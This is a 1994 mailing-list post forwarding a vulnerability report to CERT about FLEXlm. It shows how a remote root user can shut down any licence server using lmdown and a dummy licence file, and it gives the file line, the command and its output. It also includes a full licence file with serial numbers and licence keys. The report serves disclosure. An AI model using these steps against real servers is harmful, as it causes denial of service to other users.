mailing list archives
From: rjd4 () ucs cam ac uk (Bob Dowling)
Date: Thu, 24 Feb 1994 21:01:08 +0000
I'm new to this mailing list, so if the format of this report is
incorrect or inappropriate, please don't flame me too much.
This is a copy of a report I sent to the CERT some time ago about
Highland's FLEXlm software. I've just been told that what I describe
here as a denial of service *attack* is causing serious problems in one
of our departments simply through *accident*.
I've removed the Sun engineer's name from the included message in case
anyone decides to blame the messenger.
----- Included: Message to the CERT -----
The following is a description of what I believe to be a serious
vulnerability in the widely used FLEXlm network licensing package
written by Highland Software. You probably know about it already, but
just in case you don't, here goes...
The root user on an arbitrary network-connected machine with the FLEXlm
software can cause the FLEXlm licence manager daemon on any network-
accessible licence server to shut down using the FLEXlm lmdown command.
Two machines: alpha and beta. Alpha is running the FLEXlm licence
server software. Alpha does not "trust" beta in any way. Beta has a
copy of the FLEXlm software too, and in particular has the lmdown
program. On beta a one line dummy licence data file is created in
/etc/licence.dat pointing at alpha:
SERVER alpha 7260057c 1700
(The hostid "7260057c" is not alpha's; it is deliberately incorrect.)
alpha's licence data file is
SERVER alpha 7260057b 1700
DAEMON suntechd /opt/SUNWspro/bin
# Serial No FX2811-162-13
# 1 user license for SPARCompiler_C 2.0FCS, Expires: Never
FEATURE sunpro.c suntechd 2.000 1-jan-0 1 EBA8B0F1534F569284CD ""
# Serial No FX6696-16201-10
# 1 user license for SPARCompiler_Fortran 2.01FCS, Expires: Never
FEATURE sunpro.f77 suntechd 2.010 1-jan-0 1 8B7850316C56E1F2467B ""
# Serial No FX3928-16301-4
# 1 user license for SPARCompiler_C++ 3.01FCS, Expires: Never
FEATURE sunpro.cc suntechd 3.010 1-jan-0 1 BBA86001599F95AC7CE7 ""
# Serial No FX11-4036301-7 - using FX6-4026301-7 FX1667-16301-7
# 3 user license for SPARCompiler_Pascal 3.01FCS, Expires: Never
FEATURE sunpro.pc suntechd 3.010 1-jan-0 3 8BD84051269969C54B14 ""
# Serial No FX128-162-1
# 1 user license for SPARCworks 2.0FCS, Expires: Never
FEATURE sunpro.sparcworks.tools suntechd 2.000 1-jan-0 1 3B38D011304C4D636ADA ""
On beta I give the following instructions as root:
# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.
Shutting down FLEXlm on nodes: alpha
Are you sure? [y/n]: y
Shut down node alpha
and alpha's licence serving is indeed shut down.
*** Action so far:
I reported this as a bug to Sun, who supplied us with the FLEXlm
software as part of their compiler kit. (Though I don't regard it as a
Sun-specific problem; I think this is a function purely of the FLEXlm
software.) I enclose their response:
----- Included message: -----
- FLEXlm problem Bob Dowling (Feb 24)